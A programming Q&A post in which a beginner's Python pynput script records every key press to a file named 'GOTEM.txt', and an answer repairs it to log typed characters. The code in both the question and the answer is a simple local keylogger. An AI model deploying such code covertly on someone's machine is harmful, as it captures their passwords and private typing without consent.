# Writing in a file while reading the keybord with pynput not working

Tags: python, file, pynput

```
from pynput.keyboard import Key, Listener
lol = open("GOTEM.txt",'a')

def on_press(key):
    lol.write('{0}'.format(key)) 
with Listener(on_press=on_press) as listener:
    listener.join()
lol.close()
```

100% a code problem because I tried writing into a file without the whole keybord thing and it works just fine.I am new to coding so ik I made some stupid mistake.

Answer (score 0):

You need to convert the key to char. You can use `key.char` to get the string without any single quotes around it. But be careful, as it will throw an `AttributeError` if the key is a special key like space, backspace, control keys etc. So you'll have to put it in a try/except block.

You should only open file when you are going to perform any operation.

This should do the trick:

```py
from pynput.keyboard import Key, Listener
    
def on_press(key):
    with open("GOTEM.txt",'a') as lol:
        try:
            k = key.char
            lol.write(k)
        except AttributeError:
            if key == Key.space:
                lol.write('\n') 
   
with Listener(on_press=on_press) as listener:
    listener.join()
```